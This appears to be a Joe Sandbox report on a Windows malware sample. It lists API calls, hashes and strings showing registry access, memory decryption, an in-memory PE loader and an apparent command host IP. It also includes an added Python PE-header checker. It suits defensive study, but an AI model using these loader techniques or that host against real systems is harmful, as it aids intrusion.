                        • Opcode Fuzzy Hash: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                        • Instruction Fuzzy Hash: 11519071E002099FDF14CFA9C985BEEB7B9EB08304F10812EE915B76C1D7796944CB94

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1303 6017c8-6017cc 1304 601824-60251a 1303->1304 1305 6017ce-6035e4 1303->1305 1310 6037e2-603932 1304->1310 1305->1310 1311 603a88-604021 1305->1311 1315 605ba6-605bce 1310->1315 1311->1315 1317 605bd0-605beb RegOpenKeyA 1315->1317 1318 605bf7-605c12 RegOpenKeyA 1315->1318 1317->1318 1319 605bed 1317->1319 1320 605c14-605c1e 1318->1320 1321 605c2a-605c56 1318->1321 1319->1318 1320->1321 1324 605c63-605c6d 1321->1324 1325 605c58-605c61 GetNativeSystemInfo 1321->1325 1326 605c79-605c87 1324->1326 1327 605c6f 1324->1327 1325->1324 1329 605c93-605c9a 1326->1329 1330 605c89 1326->1330 1327->1326 1331 605ca0-605ca7 1329->1331 1332 605cad 1329->1332 1330->1329 1331->1332 1333 605e52-605e59 1331->1333 1332->1332 1334 6064c0-6064eb 1333->1334 1335 605e5f-606354 1333->1335 1335->1334
                        APIs
                        • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00605BE3
                        • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00605C0A
                        • GetNativeSystemInfo.KERNEL32(?), ref: 00605C61
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.00000000005FD000.00000040.00000001.01000000.00000003.sdmp, Offset: 005FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5fd000_file.jbxd
                        Similarity
                        • API ID: Open$InfoNativeSystem
                        • String ID:
                        • API String ID: 1247124224-0
                        • Opcode ID: 126974285bf53a6cf9378d69875b4aa7f342bf65ad0f1b9c4238088f817c737d
                        • Instruction ID: 46dc649a0bceac164dde6f7b5a18cfdc3ce1085383846ce616bff950060586d0
                        • Opcode Fuzzy Hash: 126974285bf53a6cf9378d69875b4aa7f342bf65ad0f1b9c4238088f817c737d
                        • Instruction Fuzzy Hash: 0551F6B244820DDFEB19DF14CC04BEF37AAEF05310F14052AE98282A80E7764DA5CF59

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1339 601ed3-605bce 1347 605bd0-605beb RegOpenKeyA 1339->1347 1348 605bf7-605c12 RegOpenKeyA 1339->1348 1347->1348 1349 605bed 1347->1349 1350 605c14-605c1e 1348->1350 1351 605c2a-605c56 1348->1351 1349->1348 1350->1351 1354 605c63-605c6d 1351->1354 1355 605c58-605c61 GetNativeSystemInfo 1351->1355 1356 605c79-605c87 1354->1356 1357 605c6f 1354->1357 1355->1354 1359 605c93-605c9a 1356->1359 1360 605c89 1356->1360 1357->1356 1361 605ca0-605ca7 1359->1361 1362 605cad 1359->1362 1360->1359 1361->1362 1363 605e52-605e59 1361->1363 1362->1362 1364 6064c0-6064eb 1363->1364 1365 605e5f-606354 1363->1365 1365->1364
                        APIs
                        • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00605BE3
                        • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00605C0A
                        • GetNativeSystemInfo.KERNEL32(?), ref: 00605C61
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.00000000005FD000.00000040.00000001.01000000.00000003.sdmp, Offset: 005FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5fd000_file.jbxd
                        Similarity
                        • API ID: Open$InfoNativeSystem
                        • String ID:
                        • API String ID: 1247124224-0
                        • Opcode ID: 2cab6c5c11033bb00550e2d19be6737cd31119453f72ecf5981b35005120bc23
                        • Instruction ID: 8974b7a266df7595267ed920b7f3a4c2730123d7b10549bebf7413c083ffffb7
                        • Opcode Fuzzy Hash: 2cab6c5c11033bb00550e2d19be6737cd31119453f72ecf5981b35005120bc23
                        • Instruction Fuzzy Hash: DA316A7104820E9FEF15DF60C848BEF3BA5EB04314F04052AE98286E80E7B65DA4CF19

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1369 602506-605bce 1376 605bd0-605beb RegOpenKeyA 1369->1376 1377 605bf7-605c12 RegOpenKeyA 1369->1377 1376->1377 1378 605bed 1376->1378 1379 605c14-605c1e 1377->1379 1380 605c2a-605c56 1377->1380 1378->1377 1379->1380 1383 605c63-605c6d 1380->1383 1384 605c58-605c61 GetNativeSystemInfo 1380->1384 1385 605c79-605c87 1383->1385 1386 605c6f 1383->1386 1384->1383 1388 605c93-605c9a 1385->1388 1389 605c89 1385->1389 1386->1385 1390 605ca0-605ca7 1388->1390 1391 605cad 1388->1391 1389->1388 1390->1391 1392 605e52-605e59 1390->1392 1391->1391 1393 6064c0-6064eb 1392->1393 1394 605e5f-606354 1392->1394 1394->1393
                        APIs
                        • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00605BE3
                        • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00605C0A
                        • GetNativeSystemInfo.KERNEL32(?), ref: 00605C61
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.00000000005FD000.00000040.00000001.01000000.00000003.sdmp, Offset: 005FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5fd000_file.jbxd
                        Similarity
                        • API ID: Open$InfoNativeSystem
                        • String ID:
                        • API String ID: 1247124224-0
                        • Opcode ID: acea70cf3085f7ea49b844e4788ce6c6253513819e1b8e10571ac77f8415e5fc
                        • Instruction ID: ca964e0847c40cd7bdbe4670d0a9e8578ade5cc6e4eabee7ffcb0508820cae08
                        • Opcode Fuzzy Hash: acea70cf3085f7ea49b844e4788ce6c6253513819e1b8e10571ac77f8415e5fc
                        • Instruction Fuzzy Hash: 5131597114464E9FEF15DF10C848BEF3BA5EB05314F04052AE98686A80E7B65DA4CF19

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1398 6037dc-605bce 1403 605bd0-605beb RegOpenKeyA 1398->1403 1404 605bf7-605c12 RegOpenKeyA 1398->1404 1403->1404 1405 605bed 1403->1405 1406 605c14-605c1e 1404->1406 1407 605c2a-605c56 1404->1407 1405->1404 1406->1407 1410 605c63-605c6d 1407->1410 1411 605c58-605c61 GetNativeSystemInfo 1407->1411 1412 605c79-605c87 1410->1412 1413 605c6f 1410->1413 1411->1410 1415 605c93-605c9a 1412->1415 1416 605c89 1412->1416 1413->1412 1417 605ca0-605ca7 1415->1417 1418 605cad 1415->1418 1416->1415 1417->1418 1419 605e52-605e59 1417->1419 1418->1418 1420 6064c0-6064eb 1419->1420 1421 605e5f-606354 1419->1421 1421->1420
                        APIs
                        • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00605BE3
                        • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00605C0A
                        • GetNativeSystemInfo.KERNEL32(?), ref: 00605C61
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.00000000005FD000.00000040.00000001.01000000.00000003.sdmp, Offset: 005FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5fd000_file.jbxd
                        Similarity
                        • API ID: Open$InfoNativeSystem
                        • String ID:
                        • API String ID: 1247124224-0
                        • Opcode ID: ef415999d057c81166f5349737c17c6bf3d3dec29ab0774dce9ad2b699b419f3
                        • Instruction ID: 3fe424c16b388232343b2f5ef2775add5c1af128de4ef45e8d2c38b966d17dde
                        • Opcode Fuzzy Hash: ef415999d057c81166f5349737c17c6bf3d3dec29ab0774dce9ad2b699b419f3
                        • Instruction Fuzzy Hash: B831687114424E9FEF25DF20C848BEF3BA5FB04314F04062AE94286E80E7BA4DA5CF19

                        Control-flow Graph

                        • Graph image not reproduced. Function at 6038b0 (last block 6064c0-6064eb); API-calling blocks: 605bd0-605beb RegOpenKeyA, 605bf7-605c12 RegOpenKeyA, 605c58-605c61 GetNativeSystemInfo.
                        APIs
                        • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00605BE3
                        • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00605C0A
                        • GetNativeSystemInfo.KERNEL32(?), ref: 00605C61
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.00000000005FD000.00000040.00000001.01000000.00000003.sdmp, Offset: 005FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5fd000_file.jbxd
                        Similarity
                        • API ID: Open$InfoNativeSystem
                        • String ID:
                        • API String ID: 1247124224-0
                        • Opcode ID: c325438ab5456213338aad0ebeddb6f1f1cd3ac530bdff6783ad3b89444b46b8
                        • Instruction ID: 737b333caf160b4d79d00714229a8a9d4082bbdd8e3e1848215c6e33f71a8b4d
                        • Opcode Fuzzy Hash: c325438ab5456213338aad0ebeddb6f1f1cd3ac530bdff6783ad3b89444b46b8
                        • Instruction Fuzzy Hash: D431687204424E9FEF15DF60C848BEF3BA5FB05314F04052AE94686E80E7BA5DA4CF19

                        Control-flow Graph

                        • Graph image not reproduced. Function at 603907 (last block 6064c0-6064eb); API-calling blocks: 605bd0-605beb RegOpenKeyA, 605bf7-605c12 RegOpenKeyA, 605c58-605c61 GetNativeSystemInfo.
                        APIs
                        • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00605BE3
                        • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00605C0A
                        • GetNativeSystemInfo.KERNEL32(?), ref: 00605C61
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.00000000005FD000.00000040.00000001.01000000.00000003.sdmp, Offset: 005FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5fd000_file.jbxd
                        Similarity
                        • API ID: Open$InfoNativeSystem
                        • String ID:
                        • API String ID: 1247124224-0
                        • Opcode ID: aeda292b8d8e3ac820cd314ff623e770f09127daf5d97993d75fb54c8fb7087c
                        • Instruction ID: 7513e525db150b54791fe7eb7ca72551038cd62bd94dabd46179f9d68be4ca50
                        • Opcode Fuzzy Hash: aeda292b8d8e3ac820cd314ff623e770f09127daf5d97993d75fb54c8fb7087c
                        • Instruction Fuzzy Hash: 10315C7104428E9FEF16CF60C848ADF3BB5FB06304F04056AE946C6A92D7BA5DA5CF19

                        Control-flow Graph

                        • Graph image not reproduced. Function at 413cb9 (blocks 413cb9-413d06); 413ce2-413cf3 RtlAllocateHeap; internal calls to 40d0dd, 412473 and 4116b2.
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,185.156.72.65,?,?,004035B7,?,?,5(@), ref: 00413CEB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID: 5(@
                        • API String ID: 1279760036-4133491027
                        • Opcode ID: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                        • Instruction ID: 6b8e07f77369cee0563c76895a616f9db891ca7c172fe53b45855655e8c042ba
                        • Opcode Fuzzy Hash: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                        • Instruction Fuzzy Hash: 10E0E5322002115BD6213F669C05BDB7A5C9B417A2F140137FC56F62D0EA6DCDC241ED

                        Control-flow Graph

                        • Graph image not reproduced. Function at 4950e0f (blocks 4950e0f-4950e2c); 4950e0f-4950e24 SetErrorMode called twice.
                        APIs
                        • SetErrorMode.KERNEL32(00000400,?,?,04950223,?,?), ref: 04950E19
                        • SetErrorMode.KERNEL32(00000000,?,?,04950223,?,?), ref: 04950E1E
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorMode
                        • String ID:
                        • API String ID: 2340568224-0
                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                        • Instruction ID: 43bafc9d913032364e66eb76556220aff11c3ffb76751d3d3a00cc89f2821bfa
                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                        • Instruction Fuzzy Hash: 3ED0123114512877D7002A94DC0DBCD7B1CDF05B62F108021FB0DD9080C770954047E5
                        APIs
                        • VirtualProtect.KERNEL32(?,0070416D,00000004), ref: 007041E8
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000703000.00000040.00000001.01000000.00000003.sdmp, Offset: 00703000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_703000_file.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        • Opcode ID: e365971416a22fce803c0c735a85f4f9c58e53581c361715661cd1db79a17ea1
                        • Instruction ID: 44dede731cf413af53fc9a249d49cc28fdaf6bac9b1fd89e799f5543e0e8474d
                        • Opcode Fuzzy Hash: e365971416a22fce803c0c735a85f4f9c58e53581c361715661cd1db79a17ea1
                        • Instruction Fuzzy Hash: 621104B714824AEFE305CF149D45BEE7BB6FBD1320F30452AE40157A80D37A5D2A8B68
                        APIs
                        • VirtualProtect.KERNEL32(?,0070416D,00000004), ref: 007041E8
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000703000.00000040.00000001.01000000.00000003.sdmp, Offset: 00703000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_703000_file.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        • Opcode ID: b6477aecbf4515be66977f71742ed3a356c34319b02a6bc3707399bfb88a1e12
                        • Instruction ID: 6f51b5bc6eb951b6c05215dc1b464c35aa5572d36e691920c54269edf38c34c3
                        • Opcode Fuzzy Hash: b6477aecbf4515be66977f71742ed3a356c34319b02a6bc3707399bfb88a1e12
                        • Instruction Fuzzy Hash: C111E5BA14820AEFE305CF14D904BEA77F6FFD4320F308129E50187A80D3B94D659BA8
                        APIs
                        • VirtualProtect.KERNEL32(?,0070416D,00000004), ref: 007041E8
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000703000.00000040.00000001.01000000.00000003.sdmp, Offset: 00703000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_703000_file.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        • Opcode ID: 48e0b2244f8dff55e3ba0263227575f603970d1cc9055da8e7ad0e98a26c0f0d
                        • Instruction ID: 5a92e0cdd982874a0baafe078ea6b4794080f4b4be3ccc23266296c4d2e82632
                        • Opcode Fuzzy Hash: 48e0b2244f8dff55e3ba0263227575f603970d1cc9055da8e7ad0e98a26c0f0d
                        • Instruction Fuzzy Hash: E211C2F750810AEFE304CF04D9447AA77A5EBE4320F308119E50187A80D3798D659B64
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.00000000005FD000.00000040.00000001.01000000.00000003.sdmp, Offset: 005FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5fd000_file.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: d97f2b6fb888fb563324d9e026b97a0d555f6fe8de56eee8892d1e0d45d7be91
                        • Instruction ID: 6ec32a11454308e8e94fa3b1f2b5e02e99c8c4dc21015bfc5878110f30fb9fd7
                        • Opcode Fuzzy Hash: d97f2b6fb888fb563324d9e026b97a0d555f6fe8de56eee8892d1e0d45d7be91
                        • Instruction Fuzzy Hash: CBE0E5B154CA15DFC7082F65814563FFBF1EF80700F618C0DE0C281594D37485929B53
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 047A8174
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842703347.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_47a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                        • Instruction ID: b7ee4685b3560880c722a87af921d37dd854d14b97f1e34b5c59a131e3db5e88
                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                        • Instruction Fuzzy Hash: B5113C79A00208EFDB01DF98C989E98BBF5EF08350F058094F9489B361D371EA50DF81
                        APIs
                        • GetTempPathA.KERNEL32(00000104,?,0042C014,0041F068,00000000), ref: 04954011
                        • Sleep.KERNEL32(000003E8), ref: 049541A9
                        • __Init_thread_footer.LIBCMT ref: 0495477E
                        • __Init_thread_footer.LIBCMT ref: 04954944
                        • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,04956D28,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 04954B4E
                        • __Init_thread_footer.LIBCMT ref: 04954BDC
                        • __Init_thread_footer.LIBCMT ref: 04954E45
                        • CoInitialize.OLE32(00000000), ref: 04954EC6
                        • CoCreateInstance.COMBASE(0041F290,00000000,00000001,0041F260,?), ref: 04954EE1
                        • __Init_thread_footer.LIBCMT ref: 04955344
                        • Sleep.KERNEL32(00000BB8,00000000,?,04956D08,0041D8D0,0042DBDC,0042DBDD), ref: 0495555C
                        • __Init_thread_footer.LIBCMT ref: 04955652
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,04956D28,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 04954F4F
                          • Part of subcall function 04960A89: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04955D06,00000000,0042C014), ref: 04960A9E
                          • Part of subcall function 04960A89: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04960ABD
                        • __Init_thread_footer.LIBCMT ref: 049542AD
                          • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                          • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                          • Part of subcall function 04952487: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 049524BD
                          • Part of subcall function 04952487: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 049524DE
                          • Part of subcall function 04952487: CloseHandle.KERNEL32(00000000), ref: 049524E5
                        • __Init_thread_footer.LIBCMT ref: 04954489
                          • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                          • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Init_thread_footer$CriticalSection$File$CreateEnterLeavePathSleepTime$ByteCharCloseFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@WideWrite__ehfuncinfo$??2@
                        • String ID: 185.156.72.65$O@K\$Y@BA$ZK\.$rmBK
                        • API String ID: 529012138-2214808123
                        • Opcode ID: 80f03fce48ad90c555d326397e9bffadaef10e10c65fa4ab2e04da8cea0e0d82
                        • Instruction ID: 175f9b9b8e5e0ed6967ab2b4efcc17d5098a5b891e341e984bef65d0d0da54a3
                        • Opcode Fuzzy Hash: 80f03fce48ad90c555d326397e9bffadaef10e10c65fa4ab2e04da8cea0e0d82
                        • Instruction Fuzzy Hash: 52F2D1B0D042549FEB24CF24DC48BADBBB4AF44308F6442E8E8096B2A1D775BAC5CF55
                        APIs
                        • SetLastError.KERNEL32(0000000D), ref: 00402F02
                        • SetLastError.KERNEL32(000000C1), ref: 00402F44
                        Strings
                        • DOS header is not valid!, xrefs: 00402F32
                        • alignedImageSize != AlignValueUp!, xrefs: 0040302C
                        • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402FB3
                        • Size is not valid!, xrefs: 00402F08
                        • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402FA1
                        • ERROR_OUTOFMEMORY!, xrefs: 00403062
                        • DOS header size is not valid!, xrefs: 00402F71
                        • Section alignment invalid!, xrefs: 00402FC7
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast
                        • String ID: DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                        • API String ID: 1452528299-2436911586
                        • Opcode ID: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
                        • Instruction ID: feefb59cb084f329bf9f2ee3fcaf904be4f7c95626e3fbc9d9f9d2488596d2a7
                        • Opcode Fuzzy Hash: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
                        • Instruction Fuzzy Hash: C3F1AC71B00205ABCB10CF69D985BAAB7B4BF48705F14407AE909EB6C1D779ED11CB98
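The SetLastError values in this routine (0xD = ERROR_INVALID_DATA, 0xC1 = ERROR_BAD_EXE_FORMAT) together with the listed strings match the header validation at the start of a MemoryModule-style in-memory PE loader; the later routine that reports "Error protecting memory page" through OutputDebugStringA is the matching section-finalization step of such a loader. The Python below is an added editor's example, not code from the report or from the sample: it runs the same checks over a raw byte blob (for instance a buffer carved from one of the dumps listed on this page), reuses the loader's own messages as the failure reason, and follows the check order of the open-source MemoryModule library. The exact order inside this binary is not recoverable from the listing, and the page size and host machine are assumed to be the x86 defaults. The header produced by build_sample_pe is constructed for the example.

```python
import struct

IMAGE_DOS_SIGNATURE = 0x5A4D        # "MZ"
IMAGE_NT_SIGNATURE = 0x00004550     # "PE\0\0"
IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
PAGE_SIZE = 0x1000                  # assumed value of GetNativeSystemInfo().dwPageSize
SIZEOF_DOS_HEADER = 0x40
SIZEOF_FILE_HEADER = 20
SIZEOF_OPTIONAL_HEADER32 = 0xE0
SIZEOF_SECTION_HEADER = 40


def align_up(value: int, alignment: int) -> int:
    """AlignValueUp(): round value up to the next multiple of a power-of-two alignment."""
    return (value + alignment - 1) & ~(alignment - 1)


def check_pe_headers(blob: bytes, host_machine: int = IMAGE_FILE_MACHINE_I386):
    """Validate a PE32 image the way a MemoryModule-style loader does before mapping it.

    Returns (True, "ok") or (False, reason) where reason is the loader's own message.
    """
    if len(blob) < SIZEOF_DOS_HEADER:
        return False, "Size is not valid!"
    if struct.unpack_from("<H", blob, 0)[0] != IMAGE_DOS_SIGNATURE:
        return False, "DOS header is not valid!"
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    # The whole IMAGE_NT_HEADERS32 (signature + file header + optional header) must fit.
    if e_lfanew + 4 + SIZEOF_FILE_HEADER + SIZEOF_OPTIONAL_HEADER32 > len(blob):
        return False, "DOS header size is not valid!"
    if struct.unpack_from("<I", blob, e_lfanew)[0] != IMAGE_NT_SIGNATURE:
        return False, "Signature != IMAGE_NT_SIGNATURE!"
    machine, n_sections, _, _, _, size_opt, _ = struct.unpack_from("<HHIIIHH", blob, e_lfanew + 4)
    if machine != host_machine:
        return False, "FileHeader.Machine != HOST_MACHINE!"
    opt = e_lfanew + 4 + SIZEOF_FILE_HEADER
    section_alignment = struct.unpack_from("<I", blob, opt + 32)[0]
    if section_alignment & 1:
        return False, "Section alignment invalid!"
    size_of_image = struct.unpack_from("<I", blob, opt + 56)[0]
    sections = opt + size_opt
    if sections + SIZEOF_SECTION_HEADER * n_sections > len(blob):
        return False, "Size is not valid!"
    # End of the highest section: VirtualAddress + SizeOfRawData, or one alignment
    # unit for sections that carry no raw data (e.g. .bss).
    last_end = 0
    for i in range(n_sections):
        va, raw = struct.unpack_from("<II", blob, sections + SIZEOF_SECTION_HEADER * i + 12)
        last_end = max(last_end, va + (raw if raw else section_alignment))
    if align_up(size_of_image, PAGE_SIZE) != align_up(last_end, PAGE_SIZE):
        return False, "alignedImageSize != AlignValueUp!"
    return True, "ok"


def build_sample_pe(machine: int = IMAGE_FILE_MACHINE_I386, size_of_image: int = 0x2000,
                    section_alignment: int = 0x1000) -> bytes:
    """Constructed minimal PE32 header with one 0x200-byte section at RVA 0x1000 (no code)."""
    blob = bytearray(0x160)
    struct.pack_into("<H", blob, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into("<I", blob, 0x3C, SIZEOF_DOS_HEADER)                     # e_lfanew
    struct.pack_into("<I", blob, 0x40, IMAGE_NT_SIGNATURE)
    struct.pack_into("<HHIIIHH", blob, 0x44, machine, 1, 0, 0, 0, SIZEOF_OPTIONAL_HEADER32, 0x0102)
    opt = 0x58
    struct.pack_into("<H", blob, opt, 0x10B)                                  # PE32 magic
    struct.pack_into("<II", blob, opt + 32, section_alignment, 0x200)         # Section/FileAlignment
    struct.pack_into("<I", blob, opt + 56, size_of_image)
    sec = opt + SIZEOF_OPTIONAL_HEADER32
    blob[sec:sec + 8] = b".text\0\0\0"
    struct.pack_into("<IIII", blob, sec + 8, 0x100, 0x1000, 0x200, 0x200)    # VirtualSize, VA, SizeOfRawData, PointerToRawData
    return bytes(blob)


if __name__ == "__main__":
    print(check_pe_headers(build_sample_pe()))
    print(check_pe_headers(build_sample_pe(machine=IMAGE_FILE_MACHINE_AMD64)))
```

Run it over a candidate buffer with `check_pe_headers(open(path, "rb").read())`; a blob that passes every check here is one the loader would go on to VirtualAlloc and map, so it is worth carving out and analysing as a standalone module.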
                        APIs
                        • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,B6DBD0D4), ref: 00403650
                        • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403674
                        • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004036DE
                        • GetLastError.KERNEL32 ref: 004036E8
                        • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403710
                        • GetLastError.KERNEL32 ref: 0040371A
                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040372A
                        • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004037EC
                        • CryptDestroyKey.ADVAPI32(?), ref: 0040385E
                        Strings
                        • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040362C
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                        • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                        • API String ID: 3761881897-63410773
                        • Opcode ID: d367fb143b6554c856abbd5ed66d5e96836dac5444f5810d3b21dde5d4a3622d
                        • Instruction ID: 2781db946ec69ebb5a82e2500c6cd73aae13b8bfd69ebbb4ddbc14150c00f762
                        • Opcode Fuzzy Hash: d367fb143b6554c856abbd5ed66d5e96836dac5444f5810d3b21dde5d4a3622d
                        • Instruction Fuzzy Hash: DF819F71A00218AFEF209F25CC45B9ABBB9FF49300F1481BAF50DA7291DB359E858F55
                        APIs
                        • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042C014), ref: 049538B7
                        • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 049538DB
                        • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04953945
                        • GetLastError.KERNEL32 ref: 0495394F
                        • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04953977
                        • GetLastError.KERNEL32 ref: 04953981
                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04953991
                        • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04953A53
                        • CryptDestroyKey.ADVAPI32(?), ref: 04953AC5
                        Strings
                        • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04953893
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                        • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                        • API String ID: 3761881897-63410773
                        • Opcode ID: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
